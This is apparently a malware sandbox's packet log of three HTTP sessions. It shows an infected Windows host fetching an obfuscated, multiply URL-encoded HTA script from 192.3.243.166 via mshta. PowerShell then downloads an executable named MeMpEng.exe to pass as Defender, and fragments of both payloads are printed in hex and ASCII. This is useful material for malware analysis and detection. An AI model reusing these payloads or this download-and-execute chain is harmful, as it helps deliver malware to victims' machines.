                                                        Aug 28, 2024 07:01:16.459731102 CEST349OUTGET /xampp/vcc/ideanetowroking.hta HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 192.3.243.166
                                                        Connection: Keep-Alive
                                                        Aug 28, 2024 07:01:17.917185068 CEST1236INHTTP/1.1 200 OK
                                                        Date: Wed, 28 Aug 2024 05:01:16 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Tue, 27 Aug 2024 02:50:40 GMT
                                                        ETag: "1cadc-620a14e9cef29"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 117468
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/hta
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                        Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRipT%252520tyPE%25253D%252522text/vBScriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                        Aug 28, 2024 07:01:17.917208910 CEST224INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                        Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                        Aug 28, 2024 07:01:17.917217016 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                        Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                        Aug 28, 2024 07:01:17.917226076 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                        Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520ApiDnMfjvFOKDkZjTgSXMoxoIkWrtLJvoJXveeCzHvRZgjfMwOYxPDjsKiHpaeLSqAINJs
                                                        Aug 28, 2024 07:01:17.917237043 CEST448INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                        Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                        Aug 28, 2024 07:01:17.917246103 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                        Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                        Aug 28, 2024 07:01:17.917258024 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                        Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                        Aug 28, 2024 07:01:17.917292118 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                        Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                        Aug 28, 2024 07:01:17.917300940 CEST104INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                        Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                        Aug 28, 2024 07:01:17.917309046 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                        Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                        Aug 28, 2024 07:01:17.917319059 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                        Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                        Aug 28, 2024 07:01:17.917373896 CEST1236INHTTP/1.1 200 OK
                                                        Date: Wed, 28 Aug 2024 05:01:16 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Tue, 27 Aug 2024 02:50:40 GMT
                                                        ETag: "1cadc-620a14e9cef29"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 117468
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/hta
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                        Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRipT%252520tyPE%25253D%252522text/vBScriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                        Aug 28, 2024 07:01:17.917486906 CEST1236INHTTP/1.1 200 OK
                                                        Date: Wed, 28 Aug 2024 05:01:16 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Tue, 27 Aug 2024 02:50:40 GMT
                                                        ETag: "1cadc-620a14e9cef29"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 117468
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/hta
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                        Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CScRipT%252520tyPE%25253D%252522text/vBScriPT%252522%25253E%25250ADIM%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.2249164192.3.243.166803756C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 28, 2024 07:01:19.312972069 CEST426OUTGET /xampp/vcc/ideanetowroking.hta HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Range: bytes=8896-
                                                        Connection: Keep-Alive
                                                        Host: 192.3.243.166
                                                        If-Range: "1cadc-620a14e9cef29"
                                                        Aug 28, 2024 07:01:19.900815010 CEST1236INHTTP/1.1 206 Partial Content
                                                        Date: Wed, 28 Aug 2024 05:01:19 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Tue, 27 Aug 2024 02:50:40 GMT
                                                        ETag: "1cadc-620a14e9cef29"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 108572
                                                        Content-Range: bytes 8896-117467/117468
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/hta
                                                        Data Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 [TRUNCATED]
                                                        Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                        Aug 28, 2024 07:01:19.900837898 CEST224INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                        Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                        Aug 28, 2024 07:01:19.900846958 CEST1236INData Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                        Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                        Aug 28, 2024 07:01:19.900857925 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                        Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520sEt%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                        Aug 28, 2024 07:01:19.900868893 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                        Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                        Aug 28, 2024 07:01:19.900912046 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                        Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                        Aug 28, 2024 07:01:19.900924921 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                        Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                        Aug 28, 2024 07:01:19.900939941 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                        Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                        Aug 28, 2024 07:01:19.900953054 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                        Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                        Aug 28, 2024 07:01:19.900990963 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                        Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                        Aug 28, 2024 07:01:19.905893087 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 38 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                        Data Ascii: 0%252520%252520%252520%252520%252520%252528%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.2249165192.3.243.166803880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 28, 2024 07:01:26.229604959 CEST335OUTGET /340/MeMpEng.exe HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: 192.3.243.166
                                                        Connection: Keep-Alive
                                                        Aug 28, 2024 07:01:26.800837994 CEST1236INHTTP/1.1 200 OK
                                                        Date: Wed, 28 Aug 2024 05:01:26 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Tue, 27 Aug 2024 22:30:19 GMT
                                                        ETag: "923d3-620b1c9562c2e"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 598995
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: application/lnk
                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 98 40 ec 40 f6 13 ec 40 f6 13 ec 40 f6 13 2f 4f a9 13 ee 40 f6 13 ec 40 f7 13 4f 40 f6 13 2f 4f ab 13 e3 40 f6 13 b8 63 c6 13 e0 40 f6 13 2b 46 f0 13 ed 40 f6 13 52 69 63 68 ec 40 f6 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ea 43 08 66 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 0a 3a 00 00 08 00 00 2f 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 3d 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!@@@@/O@@O@/O@c@+F@Rich@PELCfh:/5@=@p=[.textfh `.rdataXl@@.datax9@.ndata:.rsrc[p=\@@
                                                        Aug 28, 2024 07:01:26.800928116 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii: U\}t+}FEuHhzHPuuu\@BSV5pzEWPu`@eEEPud@}eT@FRVVU+M
                                                        Aug 28, 2024 07:01:26.800940037 CEST1236INData Raw: 8b f8 89 4d f4 8d 4d d0 c1 e7 0b 89 0d 24 ce 40 00 8d 4a fe 03 fe 83 f9 43 89 5d fc 0f 87 c5 17 00 00 ff 24 8d 61 2c 40 00 53 50 e8 41 41 00 00 e9 25 0f 00 00 ff 05 2c 72 7a 00 39 5d f8 0f 84 16 0f 00 00 53 ff 15 20 82 40 00 e9 0a 0f 00 00 50 e8
                                                        Data Ascii: MM$@JC]$a,@SPAA%,rz9]S @PHSPSPAxSYU3@P@Zu$@L9]9}z,@z@zj{YUMz9]z@z
